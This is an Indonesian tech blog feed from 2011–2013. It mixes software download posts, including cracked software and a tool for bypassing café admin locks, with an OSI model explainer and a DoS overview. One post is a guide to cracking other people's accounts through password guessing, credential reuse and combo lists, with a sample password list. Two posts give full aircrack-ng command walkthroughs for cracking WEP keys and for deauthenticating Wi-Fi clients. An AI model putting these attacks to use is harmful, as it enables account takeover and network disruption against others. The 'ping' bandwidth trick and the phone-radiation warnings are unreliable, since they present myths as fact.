RC - TECH

Program Situs Favorit

noreply@blogger.com (ROCHIM-TECH) — Mon, 22 Apr 2013 11:59:00 +0000

Psitus adalah sebuah software portable yang menyimpan berbagai situs terpopuler dan terfavorit yang sering di kunjungi. keunggulan software ini adalah kita tidak perlu repot-repot mengetik situs pada browser, cukup dengan mengklik software dan memilih kategori situs yang di kehendaki dengan sendirinya situs tersebut akan muncul pada browser anda, keren kan :-). Dalam software ini situs di kelompokkan menjadi beberapa kategori, diantaranya: Search Engine, Sosial Network, Online Steaming, download, commerce, dan news. Software ini akan terasa lebih keren jika di jadikan shortcut pada desktop atau di pasang di taskbar anda, karena akan menjadi mudah. Anda penasaran silahkan klik disini untuk mendownloadnya.

Bloody Roar 2 untuk PC

noreply@blogger.com (ROCHIM-TECH) — Tue, 18 Dec 2012 02:34:00 +0000

Bagi penggemar game khususnya play station, pasti sudah pernah dengar dengan yang namanya Bloody Roar. Permainan yang dulu pernah populer saat aku masih kecil. Pertarungan antar pemain yang dapat berubah menjadi monster. Masing-masing memiliki keahlian khusus dan tenaga super yang berbeda-beda.
Tokoh-tokoh dalam game ini adalah Yugo The Wolf, Stun The Insect, Shina The Leopard, Bakuryu The Mole, Long The Tiger, Alice The Rabbit, Uriko The Half Beast, Busuzima The Chamelion, Jenny The Bat. Jika bisa menyelesaikan pertarungan tanpa mengalami kekalahan dua ronde maka bisa mendapatkan pemain baru yaitu Gado The Lion dan Shenlong The Tiger.
Game Play Station One ini kini dapat dimainkan di PC Komputer. Penasaran dengan ingin mencoba gamenya, langsung aja KLIK DISINI untuk mendowloadnya.

Tombol keyboard yang dugunakan dalam pertarungan ini :

Z : tendangan
X : pukulan
S : berubah menjadi monster (dan cakar)
A : Jurus mengunci (conditional)
Shift : Jurus Super (Jika sudah berubah menjadi monster)
right : berjalan ke depan (jika posisi anda di sebelah kiri)
left : mundur
up : lompat
down : merunduk
right 2X : berlari
Gunakan kombinasi tombol arah + pukulan/tendangan untuk mengeluarkan jurus.

LINK DOWNLOAD MEDIAFIRE

OfficeFIX 6.66

noreply@blogger.com (ROCHIM-TECH) — Sat, 17 Nov 2012 11:05:00 +0000

Kali ini saya akan share sebuah aplikasi yang bernama OfficeFIX. Aplikasi ini berfungsi untuk memperbaiki file office yang rusak atau tidak bisa dibuka. Cara menggunakan aplikasi ini sangat mudah sekali, download terlebih dahulu aplikasi ini kemudian Install di komputer Anda lalu Pilih file Office yang ingin diperbaiki, klik SELECT FILE->RECOVER->SAVE di tempat yang diinginkan
Hebatnya program ini dapat memperbaiki berbagai file Office yang rusak, seperti file .doc (Word), .xls (Excel), Microsoft Access dan Outlook. Silahkan klik DISINI untuk mendownload aplikasi ini.

Trik Sedot Bandwith Wi-Fi Biar Akses Lebih Cepat

noreply@blogger.com (ROCHIM-TECH) — Sat, 17 Nov 2012 10:20:00 +0000

Ini neh caranya biar pakai Wi-Fi main cepat, tapi trik ini hanya berlaku di Windows. Cara ini dapat dilakukan untuk menyedot bandwith satu jaringan Wi-Fi yang digunakan banyak orang. Berikut tips cara meng-hack Wi-Fi dengan mudah :

1. Buka Run, ketikkan cmd.exe dan akan muncul jendela baru

2. Ketikan ipconfig/all di pointer yang kedip-kedip. Perintah ini berfungsi untuk menampilkan informasi seputar koneksi dimana anda berada sekarang

3. Cari yang namanya DNS Server kemudian lihat kode yang ada di sebelahnya, dan kode itu yang harus anda ingat, dan kalo perlu tulis dahulu di notepad.

4. Scroll ke bawah, ketik perintah ping -L 500 dan kode DNS Server yang tertera di komputer anda tadi. Sedangkan untuk angka 500 merupakan kecepatan yang diinginkan

5. Tekan Enter, minimize kotak dialog RUN dan jangan ditutup.

Berita Kiamat 'Blackout' 21 Desember Adalah Palsu

noreply@blogger.com (ROCHIM-TECH) — Sat, 17 Nov 2012 10:12:00 +0000

Berita terbaru mengenai kiamat yang akan terjadi pada 21 Desember 2012 dan berita bahwa tiga hari menjelang Natal akan terjadi "blackout" adalah berita palsu. Hal ini dikuatkan oleh pakar astronomi Prof Dr Thomas Djamaluddin, yang menyebutkan bahwa tidak ada konfigurasi segarisnya planet dan tidak mungkin matahari terhalangi penuh, sehingga bumi gelap. Ia membantah, info yang menyebut NASA bahwa semua planet termasuk matahari dan bumi saat itu berada sejajar membentuk sebuah garis lurus untuk pertama kalinya, dan menyebabkan bumi tertutup planet hingga terjadi kegelapan total pada 23-25 Desember 2012. Ia menambahkan, satu-satunya keterkaitan astronomi dengan kiamat 2012 itu yang benar adalah soal puncak aktivitas matahari pada 2012, di mana medan magnet matahari mencapai suatu tingkat kompleksitas magnetik terlalu tinggi, sehingga melepaskan energi. “Tapi itupun telah bergeser ke pertengahan 2013," ujarnya.

SchoolBell 7.1 Full Crack

noreply@blogger.com (ROCHIM-TECH) — Sat, 17 Nov 2012 01:11:00 +0000

SchoolBell dapat memutar suara pada waktu tertentu. Hal ini dapat digunakan untuk mengontrol sistem suara dari sebuah sekolah atau bisnis. Suara dapat memudar setelah waktu tertentu, file musik sehingga normal dapat digunakan! Tabel yang berbeda memungkinkan non-standar jadwal pada beberapa hari (misalnya pada hari Jumat). Waktu sistem dapat disinkronkan melalui internet.

fitur:

     Sampai 7 tabel waktu dengan max. 100 entri
     Bermain WAV, MP3 dan MIDI-file
     Berbeda suara untuk acara khusus
     Fade-out fungsi untuk menggunakan file lagu
     Visualisasi dari acara berikutnya dengan hitungan mundur jam
     jaringan modus
     Modus hemat energi
     Waktu sinkronisasi melalui Internet
     Bekerja di latar belakang
     Sederhana mengedit jadwal
     Sebuah program atau dokumen dapat diaktifkan pada timer event

silahkan klik DISINI untuk mendownloadnya.

Unlock Them All

noreply@blogger.com (ROCHIM-TECH) — Fri, 16 Nov 2012 12:44:00 +0000

Unlock Them All adalah sebuah yang berfungsi untuk membuka settingan pengatura windows yang dionaktifkan oleh administrator, contohnya task manager didisable, regedit didisable, run hilang, dan masih banyak lagi keluhan-keluhan lainnya. Makanya berdasarkan pengalaman saya pula jika pergi ke warnet dan hak akses kita dibatasi sungguh menyebalkan pula itu, kita tidak bisa bebas untuk berkreasi dan belajar. Oleh sebab itu untuk memecahkan masalah tersebut saya share aplikasi ini dan saya masih promosi blog saya maka aplikasi ini saya gratiskan. Silahkan klik DISINI untuk mendownloadnya.

SecurityKISS

noreply@blogger.com (ROCHIM-TECH) — Fri, 09 Nov 2012 00:38:00 +0000

SecurityKISS adalah Layanan VPN gratis untuk Windows yang menawarkan fitur terbaik. Tunnel SecurityKISS adalah implementasi VPN berdasarkan pada OpenVPN. Salah satu fitur unik dari aplikasi ini adalah sangat sederhana untuk digunakan dan tidak memerlukan pendaftaran atau account pengguna.
Yang perlu Anda lakukan adalah untuk memulai aplikasi dan klik pada tombol Connect dan aplikasi akan terhubung ke VPN. Layanan ini menyediakan anda dengan 300 MB per hari free plan. Meskipun penggunaan bebas kecil untuk pengguna internet penuh waktu, itu masih sangat baik dibandingkan dengan layanan VPN gratis.
Bagi anda ingin membuka situs-situs yang di blokir tentunya software ini sangat berguna. Silahkan Klik DISINI untuk mendownload.

HotspotShield Terbaru

noreply@blogger.com (ROCHIM-TECH) — Thu, 08 Nov 2012 13:21:00 +0000

HotspotShield adalah sebuah software yang berfungsi untuk menyamarkan IP kita ke negara lain, tetapi HotspotShield merangcang menambahi beban sedikit saat kita Browser, Hotspot Shield menambahi suatu Iklan yang dinamis yang terletak di atas browser kita, tetapi Hotspot Shield berguna sekali, software ini juga bisa membuka halaman suatu web yang kita tidak bisa membukanya. Dengan software ini anda bisa membukanya tanpa hambatan, Software ini Free/Gratis bagi pengguna sehingga kita bisa memakainya terus-menerus selagi kita butuh. Hotspot Shield juga mengeluarkan 2 Versi yaitu Versi Free/Gratis dan Versi Elite, tentunya Fitur Versi HotspotShield Elite lebih lengkap di bandingkan Hotspot Shield Free. Jika Anda Penasaran dengan keampuhan software ini silahkan download DISINI

Larangan Bagi Pengguna Hape

noreply@blogger.com (ROCHIM-TECH) — Thu, 24 May 2012 08:42:00 +0000

Ini neh tips bagi yang punya handphone, sekaligus larangan yang harus disimak :
1. JANGAN TARUH DALAM SAKU CELANA
Bagi para pria yang senang meletakkan Hp di saku celana sebaiknya berpikir ulang. HP menghasilkan paparan medan elektrostatik dan elektromagnetik yg mengakibatkan infertilitas (kemandulan).
2. JANGAN LETAKKAN BERSAMA BARANG ELEKTRONIK
Jangan gunakan HP ketika sinyal lemah dekat dgn barang elektronik berpresisi tinggi (seperti TV,OVEN,KULKAS,dll). karena dapat merusak sirkuit HP.
3. JANGAN DISIMPAN DEKAT KUNCI MOBIL
Dalam keadaan tertentu HP yg digunakan dlm kendaraan akan memberikan dampak merusak terhadap peralatan elektronik kendaraan. HP yg diletakkan terlalu dekat dengan kunci mobil ternyata bisa menghapus kode elektronik yg ada di kunci tsb.
4. JANGAN POSISIKAN DEKAT KOMPUTER
Komputer dan HP sama-sama memancarkan gelombang elektromagnetik. jika berada dalam jarak yang dekat, maka keduanya akan saling merusak.
5. JANGAN MELETAKKANNYA DI TEMPAT BERSUHU TINGGI
Tempat bersuhu tinggi,kelembaban tinggi, dan berdebu merupakan kumpulan musuh HP Anda.
6. HINDARI MELETAKKAN KARTU SIM DEKAT MAGNET
Karena radiasi yg ditimbulkan HP dapat merusak floppy disk, kartu memori dan kartu kredit Anda
7. JAUHKAN DARI BENDA LOGAM
Jauhkan HP dari benda logam kecil karena magnet dalam speaker HP akan menarik benda-benda tersebut dan HP mengalami kerusakan.
8. JAUHKAN DARI ALAT PACU JANTUNG
Peralatan medis seperti alat pacu jantung dapat terganggu di karena gelombang elektromagnetik.
9. JANGAN DEKAT GAS YANG MUDAH TERBAKAR
Gas berbahaya karena memiliki tekanan tinggi dan mudah terbakar. Oleh karena itu HP Anda bisa tidak berfungsi
10. HINDARI DAERAH BASAH

Trik Bikin Gambar Lucu di Facebook Chat

noreply@blogger.com (ROCHIM-TECH) — Mon, 23 Apr 2012 03:12:00 +0000

Anda suka chat via Facebook? Berikut merupakan kode untuk menampilkan gambar lucu-lucu dengan cepat dan membubuhkan tanda kurung ganda pada awal dan akhir kata, sebagai contoh :

Memunculkan gambar Mark Zuckerberg : ketik [[Zuck]]
Membuat simbol Coca Cola : ketik [[cocacola]]
Troll face: [[171108522930776]]
Me Gusta: [[211782832186415]]
Cereal Guy: [[170815706323196]]
LOL Face: [[168456309878025]]
NO Guy: [[167359756658519]]
Forever Alone: [[177903015598419]]
Not Bad: [[NotBaad]]
Challenge accepted: [[100002727365206]]
Okay face: [[100002752520227]]
Poker face: [[129627277060203]]
Okay face: [[224812970902314]]
Socially awkward penguin: [[98438140742]]
Lamp: [[100001256102462]]
No: [[167359756658519]]
Feel like a sir: [[168040846586189]]
Forever alone Christmas: [[125038607580286]]
Problem? [[171108522930776]]

Cara Menghapus File yang Corrupt

noreply@blogger.com (ROCHIM-TECH) — Mon, 23 Apr 2012 02:58:00 +0000

Saat Anda menghapus file, jika muncul kotak dialog :
Cannot delete "nama_file", cannot find the specified path. Make sure you typed the right path.
Hal ini disebabkan karena Recycle Bin mengalami corrupt. Masalah ini biasanya muncul jika Anda menginstall dan meng-uninstall software Fix-It Utilities. Untuk itu, Anda bisa mengikuti trik berikut Restart komputer Anda.
Sebelum muncul logo Windows, tekan F8 lalu pilih Command Prompt Only.
Pada Dos Prompt, ketikkan :attrib -r -s -h c:\recycleddeltree c:\recycled

Konsep Cracking

noreply@blogger.com (ROCHIM-TECH) — Tue, 06 Mar 2012 08:12:00 +0000

Konsep Cracking

Artikel ini dimaksudkan untuk memandu Anda untuk sukses membobol akun. Jadi mari kita langsung saja.

Prinsip utama Cracking

Satu sulit untuk memahami fakta cracker baru datang untuk mencari tahu adalah cracking account tertentu biasanya sulit. Memahami fakta ini adalah langkah kunci untuk menjadi cracker berhasil. Ada sukses besar dalam jumlah. Akun pengguna yang lebih Anda harus mencoba dan retak, semakin besar kemungkinan Anda akan sukses. Alasan dibalik ini sangat sederhana dan logis. Jika Anda memiliki sepasang dadu, dan perlu roll mata ular (dua orang), semakin mencoba yang Anda miliki, maka peluang keberhasilan.

Prinsip utama dari cracking adalah berusaha sebagai pengguna sah banyak (akan dibahas nanti) mungkin. Meskipun apa yang orang lain mungkin berpikir, memiliki 10.000 account pengguna untuk mencoba dan retak skenario jauh lebih baik daripada memiliki account pengguna 3 dan 10.000 password.

Dumb Pengguna Internet

Kebanyakan orang di internet tidak memperhatikan keamanan serius. Ada gagasan salah paham tentang internet bahwa itu aman dan anonim. Kurangnya perhatian menyebabkan password ditebak dan umum. Pola, kata-kata umum, dan nama-nama umum biasanya password mungkin. Ini biasanya dipilih oleh para pengguna karena mereka mudah diingat. Lain selang umum dalam penilaian adalah kenyataan bahwa pengguna biasanya menggunakan password yang sama untuk semua hal yang mereka punya password untuk; rekening bank atau kartu kredit, E-Mail account, dan cukup banyak hal lain yang dapat Anda bayangkan.

Semua Tentang Sandi

Memilih password untuk memecahkan dengan adalah kritis terhadap keberhasilan Anda. Menggunakan "tert34g" sebagai kata sandi untuk memecahkan dengan adalah bukan ide yang baik. Ya, ada beberapa kemungkinan kecil bahwa Anda dapat mencapai salah satu upaya sukses dengan itu, tapi itu membuang-buang waktu.

Pikirkan tentang hal ini. Apa yang kebanyakan orang memiliki kesamaan? Nama, makanan favorit, binatang favorit, tim olahraga favorit, warna favorit, dll Daripada mengandalkan yang sudah ada sebelumnya daftar password, coba buat sendiri. Mengapa? Hal-hal berubah. Apa yang populer tahun lalu tidak lagi populer. MySpace sebagai password adalah logis dua tahun lalu. Sekarang, kebanyakan orang tidak login ke MySpace mereka di bulan. ide unik Anda mungkin memberikan Anda sukses besar. Pikirkan tentang apa yang populer sekarang ... Justin Bieber, Obama, atau panas Miami. Saya yakin Anda pernah berpikir dari "panas" sebagai password.

password Selektif adalah apa yang saya sebut password yang hanya berlaku untuk satu situs Web. Jika Anda mencoba untuk memecahkan akun Facebook, password seperti facebook, Facebook, atau FACEBOOK kemungkinan untuk sukses. Jika Anda ingin pergi lebih lanjut, pergi ke mengapa orang menggunakan Facebook. Anda dapat secara logis sampai pada kesimpulan bahwa orang-orang menggunakannya untuk teman, teman, dll Itu adalah password logis. Nama situs web adalah salah satu password yang paling umum digunakan oleh pengguna karena mudah diingat, dan bahwa logika yang sama berlaku untuk setiap situs mereka memiliki account dengan.

Password biasanya malas. Kebanyakan orang terlalu malas untuk menempatkan usaha apapun menjadi password, sehingga orang jarang akan memanfaatkan password. Setiap bagian dari password. Biasanya, password cased seperti Michelle jarang berhasil. Gerakan tambahan yang dibutuhkan untuk mencapai tombol shift biasanya tidak gerakan diinginkan untuk kebanyakan pengguna. password huruf kecil yang jauh yang paling populer. password Huruf Besar seperti PASSWORD mengikuti kedua, dan "benar" password cased seperti "Password" yang ketiga.

Nama sebagai password = sukses. Salah satu metode yang paling berhasil untuk cracking menggunakan nama pengguna sebagai password. password Bobby adalah mungkin bobby, dan Janet kemungkinan Janet. Anda dapat pergi lebih jauh, dan menghapus nomor dengan beberapa program. password Bobby1945 adalah mungkin bobby, atau bahkan boby1945. Sekali lagi, kemalasan. Kebanyakan program mendukung penggunaan nama pengguna sebagai password, dan dapat menghapus huruf atau angka dari password untuk kontrol ditambahkan.

Penelitian Website Anda sedang di Cracking

Banyak situs yang menjadi kritis password pengguna mereka '. Sekarang, sebagian besar memerlukan panjang password minimum, dan bahkan memiliki aturan khusus seperti mereka harus berisi angka. Untuk membantu dengan ini, saya akan menjelaskan password yang paling umum harus jenis peraturan berlaku.

Jika situs web membutuhkan sebuah angka, coba password yang umum, dan menambahkan "1", atau nomor telepon lain, di ujungnya. password1, adam1, facebook1 semua cukup masuk akal dan malas (yang adalah apa yang akan Anda untuk).

Jika situs web memerlukan huruf besar, coba memanfaatkan huruf pertama, atau semua huruf: Facebook, Password, PASSWORD, CINTA.

Jika situs web memerlukan huruf kapital dan angka, coba kapitalisasi huruf pertama dan menambahkan "1", atau nomor telepon lain, di akhir: Password1, Michelle1, Rachel1.

Jika situs web memerlukan simbol, coba tanda seru atau suatu periode pada akhir password umum (!) (.): Password, iloveyou, dll!.

Penelitian akan mencegah Anda dari membuang waktu. Jika Anda tidak melakukan penelitian yang tepat, dan Anda cracking situs yang membutuhkan password dengan panjang lebih dari 4, dan Anda menggunakan "1234" sebagai password, Anda tidak melakukan sedikit lain baik dari membuang bit dan byte bandwidth.

Mencoba Situs Lain dengan Cracked Account
9 kali dari 10, pengguna memiliki setidaknya dua account dengan password yang sama. Sebuah situasi yang ideal adalah ketika Anda retak account, dan melihat informasi account, kemudian menemukan alamat E-Mail pengguna. Ini bukan bahkan 50% mungkin, tapi ada kesempatan yang lebih baik dari biasanya bahwa Anda tahu bahwa password E-Mail address's. Jika dan ketika anda mengakses account E-Mail, itu mungkin bahwa semua situs lain pengguna telah terdaftar di telah mengirimkan dia atau nya E-Mail. Tidak banyak orang yang bersih kotak E-Mail mereka.

Jangan Crack Air; Gunakan Pengguna Valid

Jika sebuah akun tidak ada, mengapa anda mencoba untuk memecahkannya selain membuang-buang waktu? Memahami bahwa seperti password, banyak nama pengguna adalah kata-kata umum, frasa, atau pola. bobby1 lebih mungkin ada dari bobby10382.

Pada saat ini, ada beberapa program yang tersedia untuk memvalidasi apakah atau tidak rekening ada. Saya tidak akan membahas atau daftar program ini, tetapi melakukan penelitian, melainkan bernilai baik.

Combo (Database Password)

Combo, sebagaimana mereka disebut oleh cracker kebanyakan, adalah daftar nama pengguna dan password yang telah retak untuk situs lain. Ini adalah sangat sukses, tapi sukses bisa pendek hidup jika pengguna lain memiliki akses ke combo yang sama. Program yang mencari combo berguna, tetapi karena saya hanya menyatakan, keberhasilan mereka memberi bisa pendek hidup. Program ini diprediksi, dengan yang saya berarti bahwa mereka menggunakan mekanisme, yang sama mengumpulkan berulang.

Combo adalah aset besar untuk retak, tapi bisa menjadi demam emas yang pengguna lain dapat "mencuri" kerja keras Anda.

Contoh Daftar

Berikut adalah daftar password contoh kecil dari atas kepala saya yang mungkin akan berhasil:

123456
123456789
ABC123
asdf
asdfghjkl
54321
sandi
password1
lakers
bieber
michael
chris
Yesus
uang
hijau
kuning
biru
harimau
anak anjing
anak kucing
celengan
james
brandon
michelle
elizabeth
stacy

Seperti yang Anda lihat, semua password adalah kata-kata umum, atau mudah diingat pola.

Kesimpulan

Cracking rekening bisa mudah, dan dapat sulit. Ini semua tergantung pada penelitian dan upaya sebelum retak. Sukses ditaburi dengan penelitian.

Hacking Wifi - Menembus Pertahanan WEP Keys

noreply@blogger.com (ROCHIM-TECH) — Tue, 06 Mar 2012 08:08:00 +0000

Menembus Pertahanan WEP Keys BackTrack 4:

1). Jalankan BackTrack.

2). Reset driver wireless. Ketikkan:

#airmon-ng -> cek interface ath yang aktif
#airmon-ng stop ath0
#airmon-ng stop ath1 -> bila ath1 aktif
#airmon-ng start wifi0

3). Buka 3 buah console.

4). Console 1, ketikkan:

#airodump-ng ath0 -> scanning hotspot yang aktif.
#airodump-ng --channel 11 --bssid 00:0E:2E:C2:2C:0E -w target ath0

Keterangan:

Proses ini untuk mengcapture informasi dapat membantu dalam menembus WEP Key.

--bssid -> MAC-Address dari AP yang akan di crack

-w target -> hasil capture ini akan disimpan di file yang namanya target

5). Console 2, ketikkan:

Untuk membantu menciptakan pengumpulan paket data

#aireplay-ng --arpreplay -b 00:0E:2E:C2:2C:0E -h 00:0E:2E:C1:1E:83 ath0

Keterangan:

-b -> MAC-Address dari AP.

-h -> MAC-Address dari client yang aktif terhubung ke AP.

6). Console 3, ketikkan:

Untuk mempercepat pengumpulan paket data, dilakukan serangan deauthentication ke client.

#aireplay-ng --deauth 2 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

-c -> MAC-Address dari Client

-a -> MAC-Address dari AP

7). Setelah terkumpul paket data yang cukup, dilakukan cracking:

#aircrack-ng target*.cap

Maka dapat kita lihat hasil WEP Key yang berhasil didapatkan.

Hacking Wifi - Melumpuhkan Client Terhubung AP

noreply@blogger.com (ROCHIM-TECH) — Tue, 06 Mar 2012 08:07:00 +0000

Langkah -langkah Melumpuhkan Client yang terhubung pada suatu AP dengan BackTrack 4 :

1). Jalankan Live CD LinuxBackTrack 4 R2.

2). Jalankan Kismet untuk mengetahui MAC-Address AP dan MAC-Address Client serta channel dari AP. Lalu catat semua infrmasi yang didapat.

3). Tutup Kismet, lalu buka console, ketikkan:

#airmon-ng stop ath0 -> untuk mematikan driver ath0
#airmon-ng stop ath1 -> untuk mematikan driver ath1
#airmon-ng start wifi0 -> menghidupkan/mengaktifkan driver

4). Jalankan scanning wireless menggunakan Airodump :

#airodump-ng ath0

5). Berikutnya buka konsole satu lag(dgn Airodump masih aktif jalan) lakukan setting ath0 untuk melakukan serangan (De Authentication) pada komputer client (target). Ketikkan:

#ifconfig ath0 up -> untuk mengaktifkan ath0

#iwconfig ath0 mode monitor channel 11 -> menentukan agar ath0 dalam mode monitor, sedangkan angka 11 merupakan channel yang dipakai oleh AP (didapatkan dari hasil scanning Kismet).

6). Langkah terakhir, kita lakukan serangan, ketikkan:

#aireplay-ng --deauth 20 -c 00:0E:2E:C1:1E:83 -a 00:0E:2E:C2:2C:0E ath0

Keterangan:

Aireplay-ng -> program yang digunakan untuk melakukan de authentication

--deauth -> option untuk serangan de authentication

20 -> jumlah sending packet

00:0E:2E:C1:1E:83 -> MAC-Address komputer target

-a -> option untuk Access Point

00:0E:2E:C2:2C:0E -> MAC-Address Access Point

ath0 -> interface yang digunakan untuk menyerang

7 OSI LAYER

noreply@blogger.com (ROCHIM-TECH) — Sat, 10 Dec 2011 03:58:00 +0000

Model Open Systems Interconnection (OSI) diciptakan oleh International Organization for Standardization (ISO) yang menyediakan kerangka logika terstruktur bagaimana proses komunikasi data berinteraksi melalui jaringan. Standard ini dikembangkan untuk industri komputer agar komputer dapat berkomunikasi pada jaringan yang berbeda secara efisien.

Model Layer OSI

Terdapat 7 layer pada model OSI. Setiap layer bertanggung jawwab secara khusus pada proses komunikasi data. Misal, satu layer bertanggungjawab untuk membentuk koneksi antarperangkat, sementara layer lainnya bertanggungjawab untuk mengoreksi terjadinya “error”
selama proses transfer data berlangsung. Model Layer OSI dibagi dalam dua group: “upper layer” dan “lower layer”. “Upper layer” fokus pada applikasi pengguna dan bagaimana file direpresentasikan di komputer. Untuk Network Engineer, bagian utama yang menjadi perhatiannya adalah pada “lower layer”. Lower layern adalah intisari komunikasi data melalui jaringan aktual. “Open” dalam OSI adalah untuk menyatakan model jaringan yang melakukan interkoneksi tanpa memandang perangkat keras/ “hardware” yang digunakan, sepanjang software komunikasi sesuai dengan standard. Hal ini secara tidak langsung menimbulkan “modularity” (dapat dibongkar pasang).“Modularity” mengacu pada pertukaran protokol di level tertentu tanpa mempengaruhi atau merusak hubungan atau fungsi dari level lainnya. Dalam sebuah layer, protokol saling dipertukarkan, dan memungkinkan komunikasi terus berlangsung. Pertukaran ini berlangsung didasarkan pada perangkat keras “hardware” dari vendor yang berbeda dan bermacam‐macam alasan atau keinginan yang berbeda. Berikut diilustrasi dari modularity

Gambar diatas mencontohkan Jasa Antar/Kurir yang akan mengantar kiriman paket. “Modularity” pada level transportasi menyatakan bahwa tidak penting, bagaimana cara paket sampai ke pesawat. Paket untuk sampai di pesawat, dapat dikirim melalui truk atau kapal. Masing‐masing cara tersebut, pengirim tetap mengirimkan dan berharap paket tersebut sampai di Toronto. Pesawat terbang membawa paket ke Toronto tanpa memperhatikan bagaimana paket tersebut sampai di pesawat itu.

7 Layer OSI

Model OSI terdiri dari 7 layer :

1. Application

2. Presentation

3. Session

4. Transport

5. Network

6. Data Link

7. Physical

Apa yang dilakukan oleh 7 layer OSI ?

Ketika data ditransfer melalui jaringan, sebelumnya data tersebut harus melewati ke‐tujuh layer dari satu terminal, mulai dari layer aplikasi sampai physical layer, kemudian di sisi penerima, data tersebut melewati layer physical sampai aplikasi. Pada saat data melewati satu layer dari sisi pengirim, maka akan ditambahkan satu “header” sedangkan pada sisi penerima “header” dicopot sesuai dengan layernya.

Model OSI

Tujuan utama penggunaan model OSI adalah untuk membantu desainer jaringan memahami fungsi dari tiap‐tiap layer yang berhubungan dengan aliran komunikasi data. Termasuk jenis-jenis protoklol jaringan dan metode transmisi.

Model dibagi menjadi 7 layer, dengan karakteristik dan fungsinya masing‐masing. Tiap layer harus dapat berkomunikasi dengan layer di atasnya maupun dibawahnya secara langsung melalui serentetan protokol dan standard

OSI LAYER	KETERANGAN
	Application Layer: Menyediakan jasa untuk aplikasi pengguna. Layer ini bertanggungjawab atas pertukaran informasi antara program komputer, seperti program e‐mail, dan service lain yang jalan di jaringan, seperti server printer atau aplikasi komputer lainnya
	Presentation Layer: Bertanggung jawab bagaimana data dikonversi dan diformat untuk transfer data. Contoh konversi format text ASCII untuk dokumen, .gif dan JPG untuk gambar. Layer ini membentuk kode konversi, translasi data, enkripsi dan konversi.
	Session Layer: Menentukan bagaimana dua terminal menjaga, memelihara dan mengatur koneksi,‐ bagaimana mereka saling berhubungan satu sama lain. Koneksi di layer ini disebut “session”.
	Transport Layer: Bertanggung jawab membagi data menjadi segmen, menjaga koneksi logika “end‐to‐end” antar terminal, dan menyediakan penanganan error (error handling).
	Network Layer: Bertanggung jawab menentukan alamat jaringan, menentukan rute yang harus diambil selama perjalanan, dan menjaga antrian trafik di jaringan. Data pada layer ini berbentuk paket.
	Data Link Layer: Menyediakan link untuk data, memaketkannya menjadi frame yang berhubungan dengan “hardware” kemudian diangkut melalui media. komunikasinya dengan kartu jaringan, mengatur komunikasi layer physical antara sistem koneksi dan penanganan error.
	Physical Layer: Bertanggung jawab atas proses data menjadi bit dan mentransfernya melalui media, seperti kabel, dan menjaga koneksi fisik antar sistem.

Jenis-jenis Serangan Pada Jaringan Komputer

noreply@blogger.com (ROCHIM-TECH) — Sat, 12 Nov 2011 04:31:00 +0000

Jenis-jenis Ancaman pada jaringan komputer

Berikut ini akan dijelaskan beberapa tipe-tipe serangan yang dapat dilancarkan oleh pihak-pihak

tertentu terhadap sebuah jaringan komputer:

– DOS/DDOS

Denial of Services dan Distributed Denial of Services adalah sebuah metode serangan yang

bertujuan untuk menghabiskan sumber daya sebuah peralatan jaringan komputer sehingga

layanan jaringan komputer menjadi terganggu.

Salah satu bentuk serangan ini adalah 'SYN Flood Attack', yang mengandalkan kelemahan

dalam sistem 'three-way-handshake'. 'Three-way-handshake' adalah proses awal dalam

melakukan koneksi dengan protokol TCP. Proses ini dimulai dengan pihak klien mengirimkan

paket dengan tanda SYN. Lalu kemudian pihak server akan menjawab dengan mengirimkan

paket dengan tanda SYN dan ACK. Terakhir, pihak klien akan mengirimkan paket ACK.

Setelah itu, koneksi akan dinyatakan terbuka, sampai salah satu pihak mengirimkan paket FIN

atau paket RST atau terjadi connection time-out. Dalam proses 'three-way-handshake', selain

terjadi inisiasi koneksi, juga terjadi pertukaran data-data parameter yang dibutuhkan agar

koneksi yang sedang dibuat dalam berjalan dengan baik.

Dalam serangan ini, sebuah host akan menerima paket inisiasi koneksi (Paket dengan flag SYN)

dalam jumlah yang sangat banyak secara terus menerus. Akibatnya host yang sedang diserang

akan melakukan alokasi memori yang akan digunakan untuk menerima koneksi tersebut dan

karena paket inisiasi terus-menerus diterima maka ruang memori yang dapat digunakan untuk

menerima koneksi akan habis. Karena semua ruang memori yang dapat digunakan untuk

menerima koneksi sudah habis, maka ketika ada permintaan baru untuk melakukan inisiasi

koneksi, host ini tidak dapat melakukan alokasi memori sehingga permintaan baru ini tidak

dapat dilayani oleh host ini. Untuk menghindari pelacakan, biasanya paket serangan yang

dikirimkan memiliki alamat IP sumber yang dipalsukan. Untuk menghadapi serangan seperti

ini, sistem operasi – sistem operasi modern telah mengimplementasikan metode-metode

penanganan, antara lain :

 Micro-blocks. Ketika ada sebuah host menerima paket inisiasi, maka host akan

mengalokasikan ruang memori yang sangat kecil, sehingga host tersebut bisa menerima

koneksi lebih banyak. Diharapkan ruang memori dapat menampung semua koneksi

yang dikirimkan, sampai terjadi connection-time-out, dimana koneksi-koneksi yang

stale, yaitu koneksi yang tidak menyelesaikan proses 'three-way-handshake' atau sudah

lama tidak ada transaksi data, akan dihapuskan dari memori dan memberikan ruang bagi

koneksi-koneksi baru. Metode ini tidak terlalu efektif karena bergantung pada kecepatan

serangan dilakukan, apabila ternyata kecepatan paket serangan datang lebih cepat

daripada lamanya waktu yang perlu ditunggu agar terjadi connection-time-out pada

paket-paket yang stale, make ruang memori yang dapat dialokasikan akan tetap habis.

 SYN Cookies. Ketika menerima paket inisiasi, host penerima akan mengirimkan paket

tantangan yang harus dijawab pengirim, sebelum host penerima mengalokasikan

memori yang dibutuhkan. Tantangan yang diberikan adalah berupa paket SYN-ACK

dengan nomor urut khusus yang merupakan hasil dari fungsi hash dengan input alamat

IP pengirim, nomor port, dll. Jawaban dari pengirim akan mengandung nomor urut

tersebut. Tetapi untuk melakukan perhitungan hash membutuhkan sumber-daya

komputasi yang cukup besar, sehingga banyak server-server yang aplikasinya

membutuhkan kemampuan komputasi tinggi tidak mempergunakan metode ini. Metode

ini merubah waktu peng-alokasian memori, yang tadinya pada awal dari proses 'three-

way-handshake', menjadi diakhir dari proses tersebut. (notes: pada standard TCP/IP

yang baru, ditentukan bahwa diperlukan cara yang lebih baik untuk menentukan urut

paket, sehingga sulit untuk ditebak. Jadi kemungkinan secara default, metode ini akan

digunakan pada seluruh peralatan jaringan komputer atau sistem operasi yang ada).

 RST Cookies. Mirip dengan SYN Cookies, hanya tantangan yang dikirimkan host

penerima ke pengirim adalah sebuah paket yang salah. Apabila pengirim adalah

pengirim yang valid, maka pengirim akan mengirimkan paket RST lalu mengulang

kembali koneksi. Ketika penerima menerima paket RST, host tersebut tahu bahwa

